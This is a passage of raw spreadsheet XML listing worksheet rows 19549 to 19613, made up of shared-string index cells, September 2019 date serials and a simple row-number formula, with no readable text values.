      <c r="C19549" t="s">
        <v>25497</v>
      </c>
      <c r="D19549" s="1">
        <v>43730</v>
      </c>
      <c r="E19549" t="s">
        <v>31355</v>
      </c>
      <c r="F19549" t="s">
        <v>9975</v>
      </c>
      <c r="G19549" t="s">
        <v>31356</v>
      </c>
    </row>
    <row r="19550" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19550">
        <f t="shared" si="305"/>
        <v>19549</v>
      </c>
      <c r="B19550">
        <v>4549</v>
      </c>
      <c r="C19550" t="s">
        <v>25497</v>
      </c>
      <c r="D19550" s="1">
        <v>43711</v>
      </c>
      <c r="F19550" t="s">
        <v>9975</v>
      </c>
      <c r="G19550" t="s">
        <v>31357</v>
      </c>
    </row>
    <row r="19551" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19551">
        <f t="shared" si="305"/>
        <v>19550</v>
      </c>
      <c r="B19551">
        <v>4550</v>
      </c>
      <c r="C19551" t="s">
        <v>25497</v>
      </c>
      <c r="D19551" s="1">
        <v>43711</v>
      </c>
      <c r="E19551" t="s">
        <v>25543</v>
      </c>
      <c r="F19551" t="s">
        <v>9975</v>
      </c>
      <c r="G19551" t="s">
        <v>31358</v>
      </c>
    </row>
    <row r="19552" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19552">
        <f t="shared" si="305"/>
        <v>19551</v>
      </c>
      <c r="B19552">
        <v>4551</v>
      </c>
      <c r="C19552" t="s">
        <v>25497</v>
      </c>
      <c r="D19552" s="1">
        <v>43716</v>
      </c>
      <c r="E19552" t="s">
        <v>28786</v>
      </c>
      <c r="F19552" t="s">
        <v>10526</v>
      </c>
      <c r="G19552" t="s">
        <v>31359</v>
      </c>
    </row>
    <row r="19553" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19553">
        <f t="shared" si="305"/>
        <v>19552</v>
      </c>
      <c r="B19553">
        <v>4552</v>
      </c>
      <c r="C19553" t="s">
        <v>25497</v>
      </c>
      <c r="D19553" s="1">
        <v>43735</v>
      </c>
      <c r="E19553" t="s">
        <v>25829</v>
      </c>
      <c r="F19553" t="s">
        <v>10021</v>
      </c>
      <c r="G19553" t="s">
        <v>31360</v>
      </c>
    </row>
    <row r="19554" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19554">
        <f t="shared" si="305"/>
        <v>19553</v>
      </c>
      <c r="B19554">
        <v>4553</v>
      </c>
      <c r="C19554" t="s">
        <v>25497</v>
      </c>
      <c r="D19554" s="1">
        <v>43711</v>
      </c>
      <c r="E19554" t="s">
        <v>25512</v>
      </c>
      <c r="F19554" t="s">
        <v>9975</v>
      </c>
      <c r="G19554" t="s">
        <v>31361</v>
      </c>
    </row>
    <row r="19555" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19555">
        <f t="shared" si="305"/>
        <v>19554</v>
      </c>
      <c r="B19555">
        <v>4554</v>
      </c>
      <c r="C19555" t="s">
        <v>25497</v>
      </c>
      <c r="D19555" s="1">
        <v>43734</v>
      </c>
      <c r="E19555" t="s">
        <v>31362</v>
      </c>
      <c r="F19555" t="s">
        <v>9975</v>
      </c>
      <c r="G19555" t="s">
        <v>31363</v>
      </c>
    </row>
    <row r="19556" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19556">
        <f t="shared" si="305"/>
        <v>19555</v>
      </c>
      <c r="B19556">
        <v>4555</v>
      </c>
      <c r="C19556" t="s">
        <v>25497</v>
      </c>
      <c r="D19556" s="1">
        <v>43733</v>
      </c>
      <c r="F19556" t="s">
        <v>9975</v>
      </c>
      <c r="G19556" t="s">
        <v>31364</v>
      </c>
    </row>
    <row r="19557" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19557">
        <f t="shared" si="305"/>
        <v>19556</v>
      </c>
      <c r="B19557">
        <v>4556</v>
      </c>
      <c r="C19557" t="s">
        <v>25497</v>
      </c>
      <c r="D19557" s="1">
        <v>43713</v>
      </c>
      <c r="E19557" t="s">
        <v>30704</v>
      </c>
      <c r="F19557" t="s">
        <v>10526</v>
      </c>
      <c r="G19557" t="s">
        <v>31365</v>
      </c>
    </row>
    <row r="19558" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19558">
        <f t="shared" si="305"/>
        <v>19557</v>
      </c>
      <c r="B19558">
        <v>4557</v>
      </c>
      <c r="C19558" t="s">
        <v>25497</v>
      </c>
      <c r="D19558" s="1">
        <v>43726</v>
      </c>
      <c r="F19558" t="s">
        <v>10526</v>
      </c>
      <c r="G19558" t="s">
        <v>31366</v>
      </c>
    </row>
    <row r="19559" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19559">
        <f t="shared" si="305"/>
        <v>19558</v>
      </c>
      <c r="B19559">
        <v>4558</v>
      </c>
      <c r="C19559" t="s">
        <v>25497</v>
      </c>
      <c r="D19559" s="1">
        <v>43715</v>
      </c>
      <c r="F19559" t="s">
        <v>9975</v>
      </c>
      <c r="G19559" t="s">
        <v>31367</v>
      </c>
    </row>
    <row r="19560" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19560">
        <f t="shared" si="305"/>
        <v>19559</v>
      </c>
      <c r="B19560">
        <v>4559</v>
      </c>
      <c r="C19560" t="s">
        <v>25497</v>
      </c>
      <c r="D19560" s="1">
        <v>43726</v>
      </c>
      <c r="E19560" t="s">
        <v>30925</v>
      </c>
      <c r="F19560" t="s">
        <v>10021</v>
      </c>
      <c r="G19560" t="s">
        <v>31368</v>
      </c>
    </row>
    <row r="19561" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19561">
        <f t="shared" si="305"/>
        <v>19560</v>
      </c>
      <c r="B19561">
        <v>4560</v>
      </c>
      <c r="C19561" t="s">
        <v>25497</v>
      </c>
      <c r="D19561" s="1">
        <v>43714</v>
      </c>
      <c r="F19561" t="s">
        <v>10021</v>
      </c>
      <c r="G19561" t="s">
        <v>31369</v>
      </c>
    </row>
    <row r="19562" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19562">
        <f t="shared" si="305"/>
        <v>19561</v>
      </c>
      <c r="B19562">
        <v>4561</v>
      </c>
      <c r="C19562" t="s">
        <v>25497</v>
      </c>
      <c r="D19562" s="1">
        <v>43734</v>
      </c>
      <c r="E19562" t="s">
        <v>25517</v>
      </c>
      <c r="F19562" t="s">
        <v>9975</v>
      </c>
      <c r="G19562" t="s">
        <v>31370</v>
      </c>
    </row>
    <row r="19563" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19563">
        <f t="shared" si="305"/>
        <v>19562</v>
      </c>
      <c r="B19563">
        <v>4562</v>
      </c>
      <c r="C19563" t="s">
        <v>25497</v>
      </c>
      <c r="D19563" s="1">
        <v>43731</v>
      </c>
      <c r="E19563" t="s">
        <v>25517</v>
      </c>
      <c r="F19563" t="s">
        <v>9975</v>
      </c>
      <c r="G19563" t="s">
        <v>31371</v>
      </c>
    </row>
    <row r="19564" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19564">
        <f t="shared" si="305"/>
        <v>19563</v>
      </c>
      <c r="B19564">
        <v>4563</v>
      </c>
      <c r="C19564" t="s">
        <v>25497</v>
      </c>
      <c r="D19564" s="1">
        <v>43720</v>
      </c>
      <c r="E19564" t="s">
        <v>25834</v>
      </c>
      <c r="F19564" t="s">
        <v>9975</v>
      </c>
      <c r="G19564" t="s">
        <v>31372</v>
      </c>
    </row>
    <row r="19565" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19565">
        <f t="shared" si="305"/>
        <v>19564</v>
      </c>
      <c r="B19565">
        <v>4564</v>
      </c>
      <c r="C19565" t="s">
        <v>25497</v>
      </c>
      <c r="D19565" s="1">
        <v>43734</v>
      </c>
      <c r="E19565" t="s">
        <v>25592</v>
      </c>
      <c r="F19565" t="s">
        <v>9975</v>
      </c>
      <c r="G19565" t="s">
        <v>31373</v>
      </c>
    </row>
    <row r="19566" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19566">
        <f t="shared" si="305"/>
        <v>19565</v>
      </c>
      <c r="B19566">
        <v>4565</v>
      </c>
      <c r="C19566" t="s">
        <v>25497</v>
      </c>
      <c r="D19566" s="1">
        <v>43711</v>
      </c>
      <c r="E19566" t="s">
        <v>31374</v>
      </c>
      <c r="F19566" t="s">
        <v>9975</v>
      </c>
      <c r="G19566" t="s">
        <v>31375</v>
      </c>
    </row>
    <row r="19567" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19567">
        <f t="shared" si="305"/>
        <v>19566</v>
      </c>
      <c r="B19567">
        <v>4566</v>
      </c>
      <c r="C19567" t="s">
        <v>25497</v>
      </c>
      <c r="D19567" s="1">
        <v>43711</v>
      </c>
      <c r="E19567" t="s">
        <v>25517</v>
      </c>
      <c r="F19567" t="s">
        <v>9975</v>
      </c>
      <c r="G19567" t="s">
        <v>31376</v>
      </c>
    </row>
    <row r="19568" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19568">
        <f t="shared" si="305"/>
        <v>19567</v>
      </c>
      <c r="B19568">
        <v>4567</v>
      </c>
      <c r="C19568" t="s">
        <v>25497</v>
      </c>
      <c r="D19568" s="1">
        <v>43731</v>
      </c>
      <c r="F19568" t="s">
        <v>9975</v>
      </c>
      <c r="G19568" t="s">
        <v>31377</v>
      </c>
    </row>
    <row r="19569" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19569">
        <f t="shared" si="305"/>
        <v>19568</v>
      </c>
      <c r="B19569">
        <v>4568</v>
      </c>
      <c r="C19569" t="s">
        <v>25497</v>
      </c>
      <c r="D19569" s="1">
        <v>43720</v>
      </c>
      <c r="F19569" t="s">
        <v>9975</v>
      </c>
      <c r="G19569" t="s">
        <v>31378</v>
      </c>
    </row>
    <row r="19570" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19570">
        <f t="shared" si="305"/>
        <v>19569</v>
      </c>
      <c r="B19570">
        <v>4569</v>
      </c>
      <c r="C19570" t="s">
        <v>25497</v>
      </c>
      <c r="D19570" s="1">
        <v>43726</v>
      </c>
      <c r="E19570" t="s">
        <v>26458</v>
      </c>
      <c r="F19570" t="s">
        <v>10021</v>
      </c>
      <c r="G19570" t="s">
        <v>31379</v>
      </c>
    </row>
    <row r="19571" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19571">
        <f t="shared" si="305"/>
        <v>19570</v>
      </c>
      <c r="B19571">
        <v>4570</v>
      </c>
      <c r="C19571" t="s">
        <v>25497</v>
      </c>
      <c r="D19571" s="1">
        <v>43724</v>
      </c>
      <c r="E19571" t="s">
        <v>25723</v>
      </c>
      <c r="F19571" t="s">
        <v>9975</v>
      </c>
      <c r="G19571" t="s">
        <v>31380</v>
      </c>
    </row>
    <row r="19572" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19572">
        <f t="shared" si="305"/>
        <v>19571</v>
      </c>
      <c r="B19572">
        <v>4571</v>
      </c>
      <c r="C19572" t="s">
        <v>25497</v>
      </c>
      <c r="D19572" s="1">
        <v>43725</v>
      </c>
      <c r="F19572" t="s">
        <v>9975</v>
      </c>
      <c r="G19572" t="s">
        <v>31381</v>
      </c>
    </row>
    <row r="19573" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19573">
        <f t="shared" si="305"/>
        <v>19572</v>
      </c>
      <c r="B19573">
        <v>4572</v>
      </c>
      <c r="C19573" t="s">
        <v>25497</v>
      </c>
      <c r="D19573" s="1">
        <v>43711</v>
      </c>
      <c r="E19573" t="s">
        <v>31382</v>
      </c>
      <c r="F19573" t="s">
        <v>9975</v>
      </c>
      <c r="G19573" t="s">
        <v>31383</v>
      </c>
    </row>
    <row r="19574" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19574">
        <f t="shared" si="305"/>
        <v>19573</v>
      </c>
      <c r="B19574">
        <v>4573</v>
      </c>
      <c r="C19574" t="s">
        <v>25497</v>
      </c>
      <c r="D19574" s="1">
        <v>43710</v>
      </c>
      <c r="E19574" t="s">
        <v>27427</v>
      </c>
      <c r="F19574" t="s">
        <v>9975</v>
      </c>
      <c r="G19574" t="s">
        <v>31384</v>
      </c>
    </row>
    <row r="19575" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19575">
        <f t="shared" si="305"/>
        <v>19574</v>
      </c>
      <c r="B19575">
        <v>4574</v>
      </c>
      <c r="C19575" t="s">
        <v>25497</v>
      </c>
      <c r="D19575" s="1">
        <v>43718</v>
      </c>
      <c r="F19575" t="s">
        <v>9975</v>
      </c>
      <c r="G19575" t="s">
        <v>31385</v>
      </c>
    </row>
    <row r="19576" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19576">
        <f t="shared" si="305"/>
        <v>19575</v>
      </c>
      <c r="B19576">
        <v>4575</v>
      </c>
      <c r="C19576" t="s">
        <v>25497</v>
      </c>
      <c r="D19576" s="1">
        <v>43711</v>
      </c>
      <c r="E19576" t="s">
        <v>25517</v>
      </c>
      <c r="F19576" t="s">
        <v>9975</v>
      </c>
      <c r="G19576" t="s">
        <v>31386</v>
      </c>
    </row>
    <row r="19577" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19577">
        <f t="shared" si="305"/>
        <v>19576</v>
      </c>
      <c r="B19577">
        <v>4576</v>
      </c>
      <c r="C19577" t="s">
        <v>25497</v>
      </c>
      <c r="D19577" s="1">
        <v>43713</v>
      </c>
      <c r="F19577" t="s">
        <v>9975</v>
      </c>
      <c r="G19577" t="s">
        <v>31387</v>
      </c>
    </row>
    <row r="19578" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19578">
        <f t="shared" si="305"/>
        <v>19577</v>
      </c>
      <c r="B19578">
        <v>4577</v>
      </c>
      <c r="C19578" t="s">
        <v>25497</v>
      </c>
      <c r="D19578" s="1">
        <v>43727</v>
      </c>
      <c r="E19578" t="s">
        <v>25517</v>
      </c>
      <c r="F19578" t="s">
        <v>9975</v>
      </c>
      <c r="G19578" t="s">
        <v>31388</v>
      </c>
    </row>
    <row r="19579" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19579">
        <f t="shared" si="305"/>
        <v>19578</v>
      </c>
      <c r="B19579">
        <v>4578</v>
      </c>
      <c r="C19579" t="s">
        <v>25497</v>
      </c>
      <c r="D19579" s="1">
        <v>43721</v>
      </c>
      <c r="F19579" t="s">
        <v>9975</v>
      </c>
      <c r="G19579" t="s">
        <v>31389</v>
      </c>
    </row>
    <row r="19580" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19580">
        <f t="shared" si="305"/>
        <v>19579</v>
      </c>
      <c r="B19580">
        <v>4579</v>
      </c>
      <c r="C19580" t="s">
        <v>25497</v>
      </c>
      <c r="D19580" s="1">
        <v>43731</v>
      </c>
      <c r="E19580" t="s">
        <v>25509</v>
      </c>
      <c r="F19580" t="s">
        <v>9975</v>
      </c>
      <c r="G19580" t="s">
        <v>31390</v>
      </c>
    </row>
    <row r="19581" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19581">
        <f t="shared" si="305"/>
        <v>19580</v>
      </c>
      <c r="B19581">
        <v>4580</v>
      </c>
      <c r="C19581" t="s">
        <v>25497</v>
      </c>
      <c r="D19581" s="1">
        <v>43720</v>
      </c>
      <c r="E19581" t="s">
        <v>25509</v>
      </c>
      <c r="F19581" t="s">
        <v>10021</v>
      </c>
      <c r="G19581" t="s">
        <v>31391</v>
      </c>
    </row>
    <row r="19582" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19582">
        <f t="shared" si="305"/>
        <v>19581</v>
      </c>
      <c r="B19582">
        <v>4581</v>
      </c>
      <c r="C19582" t="s">
        <v>25497</v>
      </c>
      <c r="D19582" s="1">
        <v>43738</v>
      </c>
      <c r="E19582" t="s">
        <v>25509</v>
      </c>
      <c r="F19582" t="s">
        <v>10021</v>
      </c>
      <c r="G19582" t="s">
        <v>31392</v>
      </c>
    </row>
    <row r="19583" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19583">
        <f t="shared" si="305"/>
        <v>19582</v>
      </c>
      <c r="B19583">
        <v>4582</v>
      </c>
      <c r="C19583" t="s">
        <v>25497</v>
      </c>
      <c r="D19583" s="1">
        <v>43723</v>
      </c>
      <c r="E19583" t="s">
        <v>28421</v>
      </c>
      <c r="F19583" t="s">
        <v>9975</v>
      </c>
      <c r="G19583" t="s">
        <v>31393</v>
      </c>
    </row>
    <row r="19584" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19584">
        <f t="shared" si="305"/>
        <v>19583</v>
      </c>
      <c r="B19584">
        <v>4583</v>
      </c>
      <c r="C19584" t="s">
        <v>25497</v>
      </c>
      <c r="D19584" s="1">
        <v>43716</v>
      </c>
      <c r="E19584" t="s">
        <v>31394</v>
      </c>
      <c r="F19584" t="s">
        <v>9975</v>
      </c>
      <c r="G19584" t="s">
        <v>31395</v>
      </c>
    </row>
    <row r="19585" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19585">
        <f t="shared" si="305"/>
        <v>19584</v>
      </c>
      <c r="B19585">
        <v>4584</v>
      </c>
      <c r="C19585" t="s">
        <v>25497</v>
      </c>
      <c r="D19585" s="1">
        <v>43731</v>
      </c>
      <c r="F19585" t="s">
        <v>9975</v>
      </c>
      <c r="G19585" t="s">
        <v>31396</v>
      </c>
    </row>
    <row r="19586" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19586">
        <f t="shared" si="305"/>
        <v>19585</v>
      </c>
      <c r="B19586">
        <v>4585</v>
      </c>
      <c r="C19586" t="s">
        <v>25497</v>
      </c>
      <c r="D19586" s="1">
        <v>43708</v>
      </c>
      <c r="E19586" t="s">
        <v>25509</v>
      </c>
      <c r="F19586" t="s">
        <v>10021</v>
      </c>
      <c r="G19586" t="s">
        <v>31397</v>
      </c>
    </row>
    <row r="19587" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19587">
        <f t="shared" ref="A19587:A19650" si="306">+ROW(A19586)</f>
        <v>19586</v>
      </c>
      <c r="B19587">
        <v>4586</v>
      </c>
      <c r="C19587" t="s">
        <v>25497</v>
      </c>
      <c r="D19587" s="1">
        <v>43727</v>
      </c>
      <c r="E19587" t="s">
        <v>25517</v>
      </c>
      <c r="F19587" t="s">
        <v>9975</v>
      </c>
      <c r="G19587" t="s">
        <v>31398</v>
      </c>
    </row>
    <row r="19588" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19588">
        <f t="shared" si="306"/>
        <v>19587</v>
      </c>
      <c r="B19588">
        <v>4587</v>
      </c>
      <c r="C19588" t="s">
        <v>25497</v>
      </c>
      <c r="D19588" s="1">
        <v>43729</v>
      </c>
      <c r="E19588" t="s">
        <v>31399</v>
      </c>
      <c r="F19588" t="s">
        <v>10526</v>
      </c>
      <c r="G19588" t="s">
        <v>31400</v>
      </c>
    </row>
    <row r="19589" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19589">
        <f t="shared" si="306"/>
        <v>19588</v>
      </c>
      <c r="B19589">
        <v>4588</v>
      </c>
      <c r="C19589" t="s">
        <v>25497</v>
      </c>
      <c r="D19589" s="1">
        <v>43735</v>
      </c>
      <c r="F19589" t="s">
        <v>9975</v>
      </c>
      <c r="G19589" t="s">
        <v>31401</v>
      </c>
    </row>
    <row r="19590" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19590">
        <f t="shared" si="306"/>
        <v>19589</v>
      </c>
      <c r="B19590">
        <v>4589</v>
      </c>
      <c r="C19590" t="s">
        <v>25497</v>
      </c>
      <c r="D19590" s="1">
        <v>43720</v>
      </c>
      <c r="E19590" t="s">
        <v>31402</v>
      </c>
      <c r="F19590" t="s">
        <v>9975</v>
      </c>
      <c r="G19590" t="s">
        <v>31403</v>
      </c>
    </row>
    <row r="19591" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19591">
        <f t="shared" si="306"/>
        <v>19590</v>
      </c>
      <c r="B19591">
        <v>4590</v>
      </c>
      <c r="C19591" t="s">
        <v>25497</v>
      </c>
      <c r="D19591" s="1">
        <v>43733</v>
      </c>
      <c r="F19591" t="s">
        <v>10021</v>
      </c>
      <c r="G19591" t="s">
        <v>31404</v>
      </c>
    </row>
    <row r="19592" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19592">
        <f t="shared" si="306"/>
        <v>19591</v>
      </c>
      <c r="B19592">
        <v>4591</v>
      </c>
      <c r="C19592" t="s">
        <v>25497</v>
      </c>
      <c r="D19592" s="1">
        <v>43735</v>
      </c>
      <c r="F19592" t="s">
        <v>9975</v>
      </c>
      <c r="G19592" t="s">
        <v>31405</v>
      </c>
    </row>
    <row r="19593" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19593">
        <f t="shared" si="306"/>
        <v>19592</v>
      </c>
      <c r="B19593">
        <v>4592</v>
      </c>
      <c r="C19593" t="s">
        <v>25497</v>
      </c>
      <c r="D19593" s="1">
        <v>43735</v>
      </c>
      <c r="E19593" t="s">
        <v>25502</v>
      </c>
      <c r="F19593" t="s">
        <v>9975</v>
      </c>
      <c r="G19593" t="s">
        <v>31406</v>
      </c>
    </row>
    <row r="19594" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19594">
        <f t="shared" si="306"/>
        <v>19593</v>
      </c>
      <c r="B19594">
        <v>4593</v>
      </c>
      <c r="C19594" t="s">
        <v>25497</v>
      </c>
      <c r="D19594" s="1">
        <v>43732</v>
      </c>
      <c r="F19594" t="s">
        <v>9975</v>
      </c>
      <c r="G19594" t="s">
        <v>31407</v>
      </c>
    </row>
    <row r="19595" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19595">
        <f t="shared" si="306"/>
        <v>19594</v>
      </c>
      <c r="B19595">
        <v>4594</v>
      </c>
      <c r="C19595" t="s">
        <v>25497</v>
      </c>
      <c r="D19595" s="1">
        <v>43731</v>
      </c>
      <c r="E19595" t="s">
        <v>27985</v>
      </c>
      <c r="F19595" t="s">
        <v>9975</v>
      </c>
      <c r="G19595" t="s">
        <v>31408</v>
      </c>
    </row>
    <row r="19596" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19596">
        <f t="shared" si="306"/>
        <v>19595</v>
      </c>
      <c r="B19596">
        <v>4595</v>
      </c>
      <c r="C19596" t="s">
        <v>25497</v>
      </c>
      <c r="D19596" s="1">
        <v>43729</v>
      </c>
      <c r="F19596" t="s">
        <v>9975</v>
      </c>
      <c r="G19596" t="s">
        <v>31409</v>
      </c>
    </row>
    <row r="19597" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19597">
        <f t="shared" si="306"/>
        <v>19596</v>
      </c>
      <c r="B19597">
        <v>4596</v>
      </c>
      <c r="C19597" t="s">
        <v>25497</v>
      </c>
      <c r="D19597" s="1">
        <v>43726</v>
      </c>
      <c r="E19597" t="s">
        <v>27924</v>
      </c>
      <c r="F19597" t="s">
        <v>9975</v>
      </c>
      <c r="G19597" t="s">
        <v>31410</v>
      </c>
    </row>
    <row r="19598" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19598">
        <f t="shared" si="306"/>
        <v>19597</v>
      </c>
      <c r="B19598">
        <v>4597</v>
      </c>
      <c r="C19598" t="s">
        <v>25497</v>
      </c>
      <c r="D19598" s="1">
        <v>43735</v>
      </c>
      <c r="E19598" t="s">
        <v>31411</v>
      </c>
      <c r="F19598" t="s">
        <v>9975</v>
      </c>
      <c r="G19598" t="s">
        <v>31412</v>
      </c>
    </row>
    <row r="19599" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19599">
        <f t="shared" si="306"/>
        <v>19598</v>
      </c>
      <c r="B19599">
        <v>4598</v>
      </c>
      <c r="C19599" t="s">
        <v>25497</v>
      </c>
      <c r="D19599" s="1">
        <v>43715</v>
      </c>
      <c r="F19599" t="s">
        <v>9975</v>
      </c>
      <c r="G19599" t="s">
        <v>31413</v>
      </c>
    </row>
    <row r="19600" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19600">
        <f t="shared" si="306"/>
        <v>19599</v>
      </c>
      <c r="B19600">
        <v>4599</v>
      </c>
      <c r="C19600" t="s">
        <v>25497</v>
      </c>
      <c r="D19600" s="1">
        <v>43714</v>
      </c>
      <c r="E19600" t="s">
        <v>31414</v>
      </c>
      <c r="F19600" t="s">
        <v>9975</v>
      </c>
      <c r="G19600" t="s">
        <v>31415</v>
      </c>
    </row>
    <row r="19601" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19601">
        <f t="shared" si="306"/>
        <v>19600</v>
      </c>
      <c r="B19601">
        <v>4600</v>
      </c>
      <c r="C19601" t="s">
        <v>25497</v>
      </c>
      <c r="D19601" s="1">
        <v>43730</v>
      </c>
      <c r="E19601" t="s">
        <v>26458</v>
      </c>
      <c r="F19601" t="s">
        <v>10021</v>
      </c>
      <c r="G19601" t="s">
        <v>31416</v>
      </c>
    </row>
    <row r="19602" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19602">
        <f t="shared" si="306"/>
        <v>19601</v>
      </c>
      <c r="B19602">
        <v>4601</v>
      </c>
      <c r="C19602" t="s">
        <v>25497</v>
      </c>
      <c r="D19602" s="1">
        <v>43735</v>
      </c>
      <c r="E19602" t="s">
        <v>25517</v>
      </c>
      <c r="F19602" t="s">
        <v>9975</v>
      </c>
      <c r="G19602" t="s">
        <v>31417</v>
      </c>
    </row>
    <row r="19603" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19603">
        <f t="shared" si="306"/>
        <v>19602</v>
      </c>
      <c r="B19603">
        <v>4602</v>
      </c>
      <c r="C19603" t="s">
        <v>25497</v>
      </c>
      <c r="D19603" s="1">
        <v>43725</v>
      </c>
      <c r="F19603" t="s">
        <v>9975</v>
      </c>
      <c r="G19603" t="s">
        <v>31418</v>
      </c>
    </row>
    <row r="19604" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19604">
        <f t="shared" si="306"/>
        <v>19603</v>
      </c>
      <c r="B19604">
        <v>4603</v>
      </c>
      <c r="C19604" t="s">
        <v>25497</v>
      </c>
      <c r="D19604" s="1">
        <v>43720</v>
      </c>
      <c r="F19604" t="s">
        <v>9975</v>
      </c>
      <c r="G19604" t="s">
        <v>31419</v>
      </c>
    </row>
    <row r="19605" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19605">
        <f t="shared" si="306"/>
        <v>19604</v>
      </c>
      <c r="B19605">
        <v>4604</v>
      </c>
      <c r="C19605" t="s">
        <v>25497</v>
      </c>
      <c r="D19605" s="1">
        <v>43719</v>
      </c>
      <c r="F19605" t="s">
        <v>9978</v>
      </c>
      <c r="G19605" t="s">
        <v>31420</v>
      </c>
    </row>
    <row r="19606" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19606">
        <f t="shared" si="306"/>
        <v>19605</v>
      </c>
      <c r="B19606">
        <v>4605</v>
      </c>
      <c r="C19606" t="s">
        <v>25497</v>
      </c>
      <c r="D19606" s="1">
        <v>43727</v>
      </c>
      <c r="F19606" t="s">
        <v>9975</v>
      </c>
      <c r="G19606" t="s">
        <v>31421</v>
      </c>
    </row>
    <row r="19607" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19607">
        <f t="shared" si="306"/>
        <v>19606</v>
      </c>
      <c r="B19607">
        <v>4606</v>
      </c>
      <c r="C19607" t="s">
        <v>25497</v>
      </c>
      <c r="D19607" s="1">
        <v>43711</v>
      </c>
      <c r="F19607" t="s">
        <v>9975</v>
      </c>
      <c r="G19607" t="s">
        <v>31422</v>
      </c>
    </row>
    <row r="19608" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19608">
        <f t="shared" si="306"/>
        <v>19607</v>
      </c>
      <c r="B19608">
        <v>4607</v>
      </c>
      <c r="C19608" t="s">
        <v>25497</v>
      </c>
      <c r="D19608" s="1">
        <v>43719</v>
      </c>
      <c r="F19608" t="s">
        <v>9975</v>
      </c>
      <c r="G19608" t="s">
        <v>31423</v>
      </c>
    </row>
    <row r="19609" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19609">
        <f t="shared" si="306"/>
        <v>19608</v>
      </c>
      <c r="B19609">
        <v>4608</v>
      </c>
      <c r="C19609" t="s">
        <v>25497</v>
      </c>
      <c r="D19609" s="1">
        <v>43730</v>
      </c>
      <c r="E19609" t="s">
        <v>31424</v>
      </c>
      <c r="F19609" t="s">
        <v>9975</v>
      </c>
      <c r="G19609" t="s">
        <v>31425</v>
      </c>
    </row>
    <row r="19610" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19610">
        <f t="shared" si="306"/>
        <v>19609</v>
      </c>
      <c r="B19610">
        <v>4609</v>
      </c>
      <c r="C19610" t="s">
        <v>25497</v>
      </c>
      <c r="D19610" s="1">
        <v>43729</v>
      </c>
      <c r="F19610" t="s">
        <v>9975</v>
      </c>
      <c r="G19610" t="s">
        <v>31426</v>
      </c>
    </row>
    <row r="19611" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19611">
        <f t="shared" si="306"/>
        <v>19610</v>
      </c>
      <c r="B19611">
        <v>4610</v>
      </c>
      <c r="C19611" t="s">
        <v>25497</v>
      </c>
      <c r="D19611" s="1">
        <v>43734</v>
      </c>
      <c r="E19611" t="s">
        <v>31427</v>
      </c>
      <c r="F19611" t="s">
        <v>10526</v>
      </c>
      <c r="G19611" t="s">
        <v>31428</v>
      </c>
    </row>
    <row r="19612" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19612">
        <f t="shared" si="306"/>
        <v>19611</v>
      </c>
      <c r="B19612">
        <v>4611</v>
      </c>
      <c r="C19612" t="s">
        <v>25497</v>
      </c>
      <c r="D19612" s="1">
        <v>43710</v>
      </c>
      <c r="E19612" t="s">
        <v>25502</v>
      </c>
      <c r="F19612" t="s">
        <v>9975</v>
      </c>
      <c r="G19612" t="s">
        <v>31429</v>
      </c>
    </row>
    <row r="19613" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19613">
        <f t="shared" si="306"/>
